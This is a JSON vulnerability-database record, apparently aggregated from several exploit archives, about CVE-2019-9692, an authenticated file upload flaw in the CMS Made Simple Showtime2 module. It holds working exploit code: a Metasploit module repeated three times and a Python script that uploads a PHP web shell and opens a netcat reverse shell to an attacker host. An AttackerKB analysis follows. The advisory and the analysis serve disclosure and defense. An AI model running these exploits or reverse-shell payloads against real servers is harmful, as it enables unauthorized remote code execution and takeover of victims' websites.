{"cve": [{"lastseen": "2022-03-24T01:05:40", "description": "class.showtime2_image.php in CMS Made Simple (CMSMS) before 2.2.10 does not ensure that a watermark file has a standard image file extension (GIF, JPG, JPEG, or PNG).", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 6.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2019-03-11T18:29:00", "type": "cve", "title": "CVE-2019-9692", "cwe": ["CWE-434"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.0, "vectorString": "AV:N/AC:L/Au:S/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-9692"], "modified": "2019-04-02T18:42:00", "cpe": [], "id": "CVE-2019-9692", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-9692", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:N/I:P/A:N"}, "cpe23": []}], "zdt": [{"lastseen": "2021-12-02T09:29:04", "description": "This Metasploit module exploits a file upload vulnerability that allows for remote command execution in Showtime2 module versions 3.6.2 and below in CMS Made Simple (CMSMS). An authenticated user with \"Use Showtime2\" privilege could exploit the vulnerability. 
The vulnerability exists in the Showtime2 module, where the class \"class.showtime2_image.php\" does not ensure that a watermark file has a standard image file extension (GIF, JPG, JPEG, or PNG). Tested on Showtime2 3.6.2, 3.6.1, 3.6.0, 3.5.4, 3.5.3, 3.5.2, 3.5.1, 3.5.0, 3.4.5, 3.4.3, 3.4.2 on CMS Made Simple (CMSMS) 2.2.9.1.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "baseScore": 6.5, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2019-03-27T00:00:00", "type": "zdt", "title": "CMS Made Simple (CMSMS) Showtime2 File Upload Remote Command Execution Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.0, "vectorString": "AV:N/AC:L/Au:S/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-9692"], "modified": "2019-03-27T00:00:00", "id": "1337DAY-ID-32435", "href": "https://0day.today/exploit/description/32435", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = NormalRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => \"CMS Made Simple (CMSMS) Showtime2 File Upload RCE\",\n 
'Description' => %q(\n This module exploits a File Upload vulnerability that lead in a RCE in\n Showtime2 module (<= 3.6.2) in CMS Made Simple (CMSMS). An authenticated\n user with \"Use Showtime2\" privilege could exploit the vulnerability.\n\n The vulnerability exists in the Showtime2 module, where the class\n \"class.showtime2_image.php\" does not ensure that a watermark file\n has a standard image file extension (GIF, JPG, JPEG, or PNG).\n\n Tested on Showtime2 3.6.2, 3.6.1, 3.6.0, 3.5.4, 3.5.3, 3.5.2, 3.5.1, 3.5.0,\n 3.4.5, 3.4.3, 3.4.2 on CMS Made Simple (CMSMS) 2.2.9.1\n ),\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Daniele Scanu', # Discovery & PoC\n 'Fabio Cogno' # Metasploit module\n ],\n 'References' =>\n [\n ['CVE', '2019-9692'],\n ['CWE', '434'],\n ['EDB', '46546'],\n ['URL', 'https://forum.cmsmadesimple.org/viewtopic.php?f=1&t=80285'],\n ['URL', 'http://viewsvn.cmsmadesimple.org/diff.php?repname=showtime2&path=%2Ftrunk%2Flib%2Fclass.showtime2_image.php&rev=47']\n ],\n 'Platform' => 'php',\n 'Arch' => ARCH_PHP,\n 'Targets' => [['Automatic', {}]],\n 'Privileged' => false,\n 'DisclosureDate' => \"Mar 11 2019\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('TARGETURI', [true, \"Base CMS Made Simple directory path\", '/']),\n OptString.new('USERNAME', [true, \"Username to authenticate with\", '']),\n OptString.new('PASSWORD', [false, \"Password to authenticate with\", ''])\n ]\n )\n end\n\n def do_login\n res = send_request_cgi(\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, 'admin', 'login.php'),\n 'vars_post' => {\n 'username' => datastore['username'],\n 'password' => datastore['password'],\n 'loginsubmit' => 'Submit'\n }\n )\n\n unless res\n fail_with(Failure::Unreachable, 'Connection failed')\n end\n\n if res.code == 302\n @csrf_name = res.headers['Location'].scan(/([^?=&]+)[=([^&]*)]?/).flatten[-2].to_s\n @csrf_value = res.headers['Location'].scan(/([^?=&]+)[=([^&]*)]?/).flatten[-1].to_s\n @cookies = 
res.get_cookies\n return\n end\n\n fail_with(Failure::NoAccess, 'Authentication was unsuccessful')\n end\n\n def upload(fname, fcontent)\n # construct POST data\n data = Rex::MIME::Message.new\n data.add_part('Showtime2,m1_,defaultadmin,0', nil, nil, \"form-data; name=\\\"mact\\\"\")\n data.add_part('Upload', nil, nil, \"form-data; name=\\\"m1_upload_submit\\\"\")\n data.add_part(@csrf_value, nil, nil, \"form-data; name=\\\"#{@csrf_name}\\\"\")\n data.add_part(fcontent, 'text/plain', nil, \"from-data; name=\\\"m1_input_browse\\\"; filename=\\\"#{fname}\\\"\")\n\n res = send_request_cgi(\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri, 'admin', 'moduleinterface.php'),\n 'ctype' => \"multipart/form-data; boundary=#{data.bound}\",\n 'data' => data.to_s,\n 'headers' => {\n 'Cookie' => @cookies\n }\n )\n\n unless res\n fail_with(Failure::Unreachable, 'Connection failed')\n end\n\n if res.code == 200 && (res.body =~ /#{Regexp.escape(fname)}/i || res.body =~ /id=\"showoverview\"/i)\n return\n end\n\n print_warning('No confidence in PHP payload success or failure')\n end\n\n def check\n res = send_request_cgi(\n 'method' => 'GET',\n 'uri' => normalize_uri(target_uri.path, 'modules', 'Showtime2', 'moduleinfo.ini')\n )\n\n unless res\n vprint_error 'Connection failed'\n return CheckCode::Unknown\n end\n\n if res.code == 200\n module_version = Gem::Version.new(res.body.scan(/^version = \"?(\\d\\.\\d\\.\\d)\"?/).flatten.first)\n if module_version < Gem::Version.new('3.6.3')\n # Showtime2 module is uploaded and present on \"Module Manager\" section but it could be NOT installed.\n vprint_status(\"Showtime2 version: #{module_version}\")\n return Exploit::CheckCode::Appears\n end\n end\n\n return Exploit::CheckCode::Safe\n end\n\n def exploit\n unless Exploit::CheckCode::Appears == check\n fail_with(Failure::NotVulnerable, 'Target is not vulnerable.')\n end\n\n @csrf_name = nil\n @csrf_value = nil\n @cookies = nil\n\n do_login\n\n # Upload PHP payload\n fname = 
\"#{rand_text_alphanumeric(3..9)}.php\"\n fcontent = \"<?php #{payload.encode} ?>\"\n print_status('Uploading PHP payload.')\n upload(fname, fcontent)\n\n # Register uploaded PHP payload file for cleanup\n register_files_for_cleanup('./' + fname)\n\n # Retrieve and execute PHP payload\n print_status(\"Making request for '/#{fname}' to execute payload.\")\n send_request_cgi(\n {\n 'method' => 'GET',\n 'uri' => normalize_uri(target_uri.path, 'uploads', 'images', fname)\n },\n 15\n )\n end\nend\n", "sourceHref": "https://0day.today/exploit/32435", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:N/I:P/A:N"}}, {"lastseen": "2019-03-16T16:42:38", "description": "Exploit for php platform in category web applications", "cvss3": {}, "published": "2019-03-15T00:00:00", "type": "zdt", "title": "CMS Made Simple Showtime2 Module 3.6.2 - Authenticated Arbitrary File Upload Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2019-9692"], "modified": "2019-03-15T00:00:00", "id": "1337DAY-ID-32361", "href": "https://0day.today/exploit/description/32361", "sourceData": "#!/usr/bin/env python\r\n# Exploit Title: CMS Made Simple (authenticated) arbitrary file upload in Showtime2 module\r\n# Exploit Author: Daniele Scanu @ Certimeter Group\r\n# Vendor Homepage: https://www.cmsmadesimple.org/\r\n# Software Link: http://viewsvn.cmsmadesimple.org/listing.php?repname=showtime2\r\n# Version: Showtime2 module <= 3.6.2\r\n# Tested on: CMS Made Simple 2.2.8 in Ubuntu 18.04\r\n# CVE : 2019-9692\r\n\r\nimport requests\r\nimport optparse\r\nfrom requests_toolbelt.multipart.encoder import MultipartEncoder\r\n\r\nparser = optparse.OptionParser()\r\nparser.add_option('-u', '--url', action=\"store\", dest=\"url\", help=\"Base target uri (ex. 
http://192.168.1.10/cms)\")\r\nparser.add_option('-U', '--username', action=\"store\", dest=\"username\", help=\"Username for login\", default=\"admin\")\r\nparser.add_option('-P', '--password', action=\"store\", dest=\"password\", help=\"Password for login\", default=\"password\")\r\nparser.add_option('-l', '--local', action=\"store\", dest=\"local\", help=\"Local uri for reverse shell\", default=\"localhost\")\r\nparser.add_option('-p', '--port', action=\"store\", dest=\"port\", help=\"Local port for reverse shell\", default=\"2222\")\r\noptions, args = parser.parse_args()\r\n\r\nif not options.url:\r\n print \"[-] Specify an uri target\"\r\n exit()\r\n\r\nif not options.username:\r\n print \"[-] Specify an username for login in administrator panel\"\r\n exit()\r\n\r\nif not options.password:\r\n print \"[-] Specify a password for login in administrator panel\"\r\n exit()\r\n\r\nbase_uri = options.url\r\nurl_login = base_uri + \"/admin/login.php\"\r\nuser = options.username\r\npassword = options.password\r\nsession = requests.Session()\r\n__c_var = \"\"\r\nlhost = options.local\r\nlport = options.port\r\n\r\n# Login in administrator panel for get the csrf token\r\ndef login(username, password):\r\n print \"[*] Login to cms\"\r\n global __c_var\r\n credentials = {\"username\": username, \"password\": password, \"loginsubmit\": \"Submit\"}\r\n response = session.post(url_login, data=credentials, allow_redirects=False)\r\n __c_var = response.headers['Location'].split(\"__c=\")[1]\r\n print \"[*] Token value: \" + __c_var\r\n\r\n# upload a php script with reverse shell in vulnerable functionality\r\ndef upload_shell():\r\n print \"[*] Uploading webshell\"\r\n multipart_data = MultipartEncoder(\r\n fields = {\r\n 'm1_input_browse': ('shell.php', \"<?php system($_REQUEST['cmd']); ?>\", 'text/plain'),\r\n '__c': __c_var,\r\n 'mact': 'Showtime2,m1_,defaultadmin,0',\r\n 'm1_upload_submit': 'Upload'\r\n }\r\n )\r\n response = session.post(base_uri + 
'/admin/moduleinterface.php', data=multipart_data,\r\n headers={'Content-Type': multipart_data.content_type})\r\n\r\n# Call the script uploaded for spawn a reverse shell\r\ndef spawn_shell():\r\n print \"[*] Spawn a shell to \" + lhost + \":\" + str(lport)\r\n payload = {\"cmd\": \"rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc \" + lhost + \" \" + str(lport) + \" >/tmp/f\"}\r\n requests.post(base_uri + \"/uploads/images/shell.php\", data=payload)\r\n\r\nlogin(user, password)\r\nupload_shell()\r\nspawn_shell()\n\n# 0day.today [2019-03-16] #", "sourceHref": "https://0day.today/exploit/32361", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}], "metasploit": [{"lastseen": "2020-10-14T19:10:07", "description": "This module exploits a File Upload vulnerability that lead in a RCE in Showtime2 module (<= 3.6.2) in CMS Made Simple (CMSMS). An authenticated user with \"Use Showtime2\" privilege could exploit the vulnerability. The vulnerability exists in the Showtime2 module, where the class \"class.showtime2_image.php\" does not ensure that a watermark file has a standard image file extension (GIF, JPG, JPEG, or PNG). 
Tested on Showtime2 3.6.2, 3.6.1, 3.6.0, 3.5.4, 3.5.3, 3.5.2, 3.5.1, 3.5.0, 3.4.5, 3.4.3, 3.4.2 on CMS Made Simple (CMSMS) 2.2.9.1\n", "edition": 2, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "baseScore": 6.5, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2019-03-19T22:48:46", "type": "metasploit", "title": "CMS Made Simple (CMSMS) Showtime2 File Upload RCE", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.0, "vectorString": "AV:N/AC:L/Au:S/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-9692"], "modified": "2020-10-02T20:00:37", "id": "MSF:EXPLOIT/MULTI/HTTP/CMSMS_SHOWTIME2_RCE", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = NormalRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => \"CMS Made Simple (CMSMS) Showtime2 File Upload RCE\",\n 'Description' => %q(\n This module exploits a File Upload vulnerability that lead in a RCE in\n Showtime2 module (<= 3.6.2) in CMS Made Simple (CMSMS). 
An authenticated\n user with \"Use Showtime2\" privilege could exploit the vulnerability.\n\n The vulnerability exists in the Showtime2 module, where the class\n \"class.showtime2_image.php\" does not ensure that a watermark file\n has a standard image file extension (GIF, JPG, JPEG, or PNG).\n\n Tested on Showtime2 3.6.2, 3.6.1, 3.6.0, 3.5.4, 3.5.3, 3.5.2, 3.5.1, 3.5.0,\n 3.4.5, 3.4.3, 3.4.2 on CMS Made Simple (CMSMS) 2.2.9.1\n ),\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Daniele Scanu', # Discovery & PoC\n 'Fabio Cogno' # Metasploit module\n ],\n 'References' =>\n [\n ['CVE', '2019-9692'],\n ['CWE', '434'],\n ['EDB', '46546'],\n ['URL', 'https://forum.cmsmadesimple.org/viewtopic.php?f=1&t=80285'],\n ['URL', 'http://viewsvn.cmsmadesimple.org/diff.php?repname=showtime2&path=%2Ftrunk%2Flib%2Fclass.showtime2_image.php&rev=47']\n ],\n 'Platform' => 'php',\n 'Arch' => ARCH_PHP,\n 'Targets' => [['Automatic', {}]],\n 'Privileged' => false,\n 'DisclosureDate' => '2019-03-11',\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('TARGETURI', [true, \"Base CMS Made Simple directory path\", '/']),\n OptString.new('USERNAME', [true, \"Username to authenticate with\", '']),\n OptString.new('PASSWORD', [false, \"Password to authenticate with\", ''])\n ]\n )\n end\n\n def do_login\n res = send_request_cgi(\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, 'admin', 'login.php'),\n 'vars_post' => {\n 'username' => datastore['username'],\n 'password' => datastore['password'],\n 'loginsubmit' => 'Submit'\n }\n )\n\n unless res\n fail_with(Failure::Unreachable, 'Connection failed')\n end\n\n if res.code == 302\n @csrf_name = res.headers['Location'].scan(/([^?=&]+)[=([^&]*)]?/).flatten[-2].to_s\n @csrf_value = res.headers['Location'].scan(/([^?=&]+)[=([^&]*)]?/).flatten[-1].to_s\n @cookies = res.get_cookies\n return\n end\n\n fail_with(Failure::NoAccess, 'Authentication was unsuccessful')\n end\n\n def upload(fname, fcontent)\n # construct POST 
data\n data = Rex::MIME::Message.new\n data.add_part('Showtime2,m1_,defaultadmin,0', nil, nil, \"form-data; name=\\\"mact\\\"\")\n data.add_part('Upload', nil, nil, \"form-data; name=\\\"m1_upload_submit\\\"\")\n data.add_part(@csrf_value, nil, nil, \"form-data; name=\\\"#{@csrf_name}\\\"\")\n data.add_part(fcontent, 'text/plain', nil, \"from-data; name=\\\"m1_input_browse\\\"; filename=\\\"#{fname}\\\"\")\n\n res = send_request_cgi(\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri, 'admin', 'moduleinterface.php'),\n 'ctype' => \"multipart/form-data; boundary=#{data.bound}\",\n 'data' => data.to_s,\n 'headers' => {\n 'Cookie' => @cookies\n }\n )\n\n unless res\n fail_with(Failure::Unreachable, 'Connection failed')\n end\n\n if res.code == 200 && (res.body =~ /#{Regexp.escape(fname)}/i || res.body =~ /id=\"showoverview\"/i)\n return\n end\n\n print_warning('No confidence in PHP payload success or failure')\n end\n\n def check\n res = send_request_cgi(\n 'method' => 'GET',\n 'uri' => normalize_uri(target_uri.path, 'modules', 'Showtime2', 'moduleinfo.ini')\n )\n\n unless res\n vprint_error 'Connection failed'\n return CheckCode::Unknown\n end\n\n if res.code == 200\n module_version = Gem::Version.new(res.body.scan(/^version = \"?(\\d\\.\\d\\.\\d)\"?/).flatten.first)\n if module_version < Gem::Version.new('3.6.3')\n # Showtime2 module is uploaded and present on \"Module Manager\" section but it could be NOT installed.\n vprint_status(\"Showtime2 version: #{module_version}\")\n return Exploit::CheckCode::Appears\n end\n end\n\n return Exploit::CheckCode::Safe\n end\n\n def exploit\n unless Exploit::CheckCode::Appears == check\n fail_with(Failure::NotVulnerable, 'Target is not vulnerable.')\n end\n\n @csrf_name = nil\n @csrf_value = nil\n @cookies = nil\n\n do_login\n\n # Upload PHP payload\n fname = \"#{rand_text_alphanumeric(3..9)}.php\"\n fcontent = \"<?php #{payload.encode} ?>\"\n print_status('Uploading PHP payload.')\n upload(fname, fcontent)\n\n # 
Register uploaded PHP payload file for cleanup\n register_files_for_cleanup('./' + fname)\n\n # Retrieve and execute PHP payload\n print_status(\"Making request for '/#{fname}' to execute payload.\")\n send_request_cgi(\n {\n 'method' => 'GET',\n 'uri' => normalize_uri(target_uri.path, 'uploads', 'images', fname)\n },\n 15\n )\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/multi/http/cmsms_showtime2_rce.rb", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:N/I:P/A:N"}}], "packetstorm": [{"lastseen": "2019-03-28T22:53:28", "description": "", "cvss3": {}, "published": "2019-03-27T00:00:00", "type": "packetstorm", "title": "CMS Made Simple (CMSMS) Showtime2 File Upload Remote Command Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2019-9692"], "modified": "2019-03-27T00:00:00", "id": "PACKETSTORM:152269", "href": "https://packetstormsecurity.com/files/152269/CMS-Made-Simple-CMSMS-Showtime2-File-Upload-Remote-Command-Execution.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \nRank = NormalRanking \n \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::FileDropper \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => \"CMS Made Simple (CMSMS) Showtime2 File Upload RCE\", \n'Description' => %q( \nThis module exploits a File Upload vulnerability that lead in a RCE in \nShowtime2 module (<= 3.6.2) in CMS Made Simple (CMSMS). An authenticated \nuser with \"Use Showtime2\" privilege could exploit the vulnerability. \n \nThe vulnerability exists in the Showtime2 module, where the class \n\"class.showtime2_image.php\" does not ensure that a watermark file \nhas a standard image file extension (GIF, JPG, JPEG, or PNG). 
\n \nTested on Showtime2 3.6.2, 3.6.1, 3.6.0, 3.5.4, 3.5.3, 3.5.2, 3.5.1, 3.5.0, \n3.4.5, 3.4.3, 3.4.2 on CMS Made Simple (CMSMS) 2.2.9.1 \n), \n'License' => MSF_LICENSE, \n'Author' => \n[ \n'Daniele Scanu', # Discovery & PoC \n'Fabio Cogno' # Metasploit module \n], \n'References' => \n[ \n['CVE', '2019-9692'], \n['CWE', '434'], \n['EDB', '46546'], \n['URL', 'https://forum.cmsmadesimple.org/viewtopic.php?f=1&t=80285'], \n['URL', 'http://viewsvn.cmsmadesimple.org/diff.php?repname=showtime2&path=%2Ftrunk%2Flib%2Fclass.showtime2_image.php&rev=47'] \n], \n'Platform' => 'php', \n'Arch' => ARCH_PHP, \n'Targets' => [['Automatic', {}]], \n'Privileged' => false, \n'DisclosureDate' => \"Mar 11 2019\", \n'DefaultTarget' => 0)) \n \nregister_options( \n[ \nOptString.new('TARGETURI', [true, \"Base CMS Made Simple directory path\", '/']), \nOptString.new('USERNAME', [true, \"Username to authenticate with\", '']), \nOptString.new('PASSWORD', [false, \"Password to authenticate with\", '']) \n] \n) \nend \n \ndef do_login \nres = send_request_cgi( \n'method' => 'POST', \n'uri' => normalize_uri(target_uri.path, 'admin', 'login.php'), \n'vars_post' => { \n'username' => datastore['username'], \n'password' => datastore['password'], \n'loginsubmit' => 'Submit' \n} \n) \n \nunless res \nfail_with(Failure::Unreachable, 'Connection failed') \nend \n \nif res.code == 302 \n@csrf_name = res.headers['Location'].scan(/([^?=&]+)[=([^&]*)]?/).flatten[-2].to_s \n@csrf_value = res.headers['Location'].scan(/([^?=&]+)[=([^&]*)]?/).flatten[-1].to_s \n@cookies = res.get_cookies \nreturn \nend \n \nfail_with(Failure::NoAccess, 'Authentication was unsuccessful') \nend \n \ndef upload(fname, fcontent) \n# construct POST data \ndata = Rex::MIME::Message.new \ndata.add_part('Showtime2,m1_,defaultadmin,0', nil, nil, \"form-data; name=\\\"mact\\\"\") \ndata.add_part('Upload', nil, nil, \"form-data; name=\\\"m1_upload_submit\\\"\") \ndata.add_part(@csrf_value, nil, nil, \"form-data; 
name=\\\"#{@csrf_name}\\\"\") \ndata.add_part(fcontent, 'text/plain', nil, \"from-data; name=\\\"m1_input_browse\\\"; filename=\\\"#{fname}\\\"\") \n \nres = send_request_cgi( \n'method' => 'POST', \n'uri' => normalize_uri(target_uri, 'admin', 'moduleinterface.php'), \n'ctype' => \"multipart/form-data; boundary=#{data.bound}\", \n'data' => data.to_s, \n'headers' => { \n'Cookie' => @cookies \n} \n) \n \nunless res \nfail_with(Failure::Unreachable, 'Connection failed') \nend \n \nif res.code == 200 && (res.body =~ /#{Regexp.escape(fname)}/i || res.body =~ /id=\"showoverview\"/i) \nreturn \nend \n \nprint_warning('No confidence in PHP payload success or failure') \nend \n \ndef check \nres = send_request_cgi( \n'method' => 'GET', \n'uri' => normalize_uri(target_uri.path, 'modules', 'Showtime2', 'moduleinfo.ini') \n) \n \nunless res \nvprint_error 'Connection failed' \nreturn CheckCode::Unknown \nend \n \nif res.code == 200 \nmodule_version = Gem::Version.new(res.body.scan(/^version = \"?(\\d\\.\\d\\.\\d)\"?/).flatten.first) \nif module_version < Gem::Version.new('3.6.3') \n# Showtime2 module is uploaded and present on \"Module Manager\" section but it could be NOT installed. 
\nvprint_status(\"Showtime2 version: #{module_version}\") \nreturn Exploit::CheckCode::Appears \nend \nend \n \nreturn Exploit::CheckCode::Safe \nend \n \ndef exploit \nunless Exploit::CheckCode::Appears == check \nfail_with(Failure::NotVulnerable, 'Target is not vulnerable.') \nend \n \n@csrf_name = nil \n@csrf_value = nil \n@cookies = nil \n \ndo_login \n \n# Upload PHP payload \nfname = \"#{rand_text_alphanumeric(3..9)}.php\" \nfcontent = \"<?php #{payload.encode} ?>\" \nprint_status('Uploading PHP payload.') \nupload(fname, fcontent) \n \n# Register uploaded PHP payload file for cleanup \nregister_files_for_cleanup('./' + fname) \n \n# Retrieve and execute PHP payload \nprint_status(\"Making request for '/#{fname}' to execute payload.\") \nsend_request_cgi( \n{ \n'method' => 'GET', \n'uri' => normalize_uri(target_uri.path, 'uploads', 'images', fname) \n}, \n15 \n) \nend \nend \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/152269/cmsms_showtime2_rce.rb.txt", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}], "attackerkb": [{"lastseen": "2021-07-20T20:19:10", "description": "CMSMS\u2019s Showtime2 module is vulnerable to an arbitrary file upload vulnerability. An authenticated attacker can exploit this by uploading a malicious payload, and gain remote code execution.\n\n \n**Recent assessments:** \n \n**wchen-r7** at September 12, 2019 6:07pm UTC reported:\n\n## Background\n\nCMS Made Simple (CMSMS) is an open source content management system. It can be used for various purposes such as galleries, company and user directories, guestbooks, E-Commerce, blogs, etc, depending on the module the user installs. It is written in PHP, and runs on MySQL.\n\nOne of the commonly downloaded modules for CMSMS is called Showtime2, a slideshow feature. 
In it, the watermark support allows an authenticated user (likely an administrator) to upload a watermark image, which can be abused to upload a malicious payload.\n\nA Metasploit module was submitted on March 19th 2019, which allowed me to investigate the vulnerability.\n\n## Vulnerability Analysis\n\n### Environment Setup\n\nIn order to analyize the vulnerability, we need to set up a vulnerable environment. The minimal requirements are:\n\n * A Ubuntu VM that supports Apache, PHP, and MySQL. \n\n * CMS Made Simple. Since the vulnerability doesn\u2019t actually come from the CMS, the latest should work. \n\n * A vulnerable version of [Showtime2](<http://dev.cmsmadesimple.org/project/files/1365>). You can just download the XML file, and import it from the module manager in CMSMS. Once imported, an \u201cinstall\u201d button will be available for you to actually install the vulnerable Showtime2 module. \n\n\n### Debugging CMSMS\n\nLike other exploit analysis cases, we usually start off with a proof-of-concept from the Metasploit module, and this one is no exception. 
Since the vulnerability involves uploading something over HTTP, the key moment would be this block of code from the exploit:\n \n \n data = Rex::MIME::Message.new\n data.add_part('Showtime2,m1_,defaultadmin,0', nil, nil, \"form-data; name=\\\"mact\\\"\")\n data.add_part('Upload', nil, nil, \"form-data; name=\\\"m1_upload_submit\\\"\")\n data.add_part(@csrf_value, nil, nil, \"form-data; name=\\\"#{@csrf_name}\\\"\")\n data.add_part(fcontent, 'text/plain', nil, \"from-data; name=\\\"m1_input_browse\\\"; filename=\\\"#{fname}\\\"\")\n \n res = send_request_cgi(\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri, 'admin', 'moduleinterface.php'),\n 'ctype' => \"multipart/form-data; boundary=#{data.bound}\",\n 'data' => data.to_s,\n 'headers' => {\n 'Cookie' => @cookies\n }\n )\n \n\nWe can see that the exploit uses the Metasploit\u2019s HttpClient API to make a request to `admin/moduleinterface.php`, so this would be our starting point for the analysis. What is the application doing to our malicious upload request? Let\u2019s check it out.\n\nBy looking at the source code for `moduleinterface.php`, my high level understanding of the code is that this is meant for loading a third-party module. 
One of the first things we see is the use of the `mact` parameter, and how the code wants to split that into multiple variables:\n \n \n if (isset($_REQUEST['mact'])) {\n $ary = explode(',', cms_htmlentities($_REQUEST['mact']), 4);\n $module = (isset($ary[0])?$ary[0]:'');\n $id = (isset($ary[1])?$ary[1]:'m1_');\n $action = (isset($ary[2])?$ary[2]:'');\n }\n \n\nBased on the `mact` data coming from the exploit, we can break down our data to these:\n\n * module = \u201cShowtime2\u201d \n\n * id = \u201cm1_\u201d \n\n * action = \u201cdefaultadmin\u201d \n\n\nAfter that, `moduleinterface.php` creates a new instance for the module the exploit asked by doing:\n \n \n $modinst = ModuleOperations::get_instance()->get_module_instance($module);\n \n\nWe know that the exploit is requesting the Showtime2 module, which means `$modinst` is technically a Showtime2 object (found as `Showtime2.module.php`), and it extends CMSModule (the base class that can be found as `class.CMSModule.php`). Once the instance is ready, the module interface triggers an action toward the end of the code:\n \n \n $modinst->DoActionBase($action, $id, $params, '', $smarty);\n \n\nFor a CMSMS module, the term \u201caction\u201d means the a feature to support. For example, if you have a module that supports editing a slideshow, then you could call your action \u201ceditslideshow\u201d, and this would be implemented as its own PHP file.\n\nThe `DoAction*` methods actually come from CMSModule (the base class the Showtime2 object extends from), and it basically triggers a PHP file to be included from the modules directory (oh and look, there is even a directory traversal patch):\n \n \n if ($name != '') {\n //Just in case DoAction is called directly and it's not overridden.\n //See: http://0x6a616d6573.blogspot.com/2010/02/cms-made-simple-166-file-inclusion.html\n $name = preg_replace('/[^A-Za-z0-9\\-_+]/', '', $name);\n \n $filename = $this->GetModulePath().'/action.' . $name . 
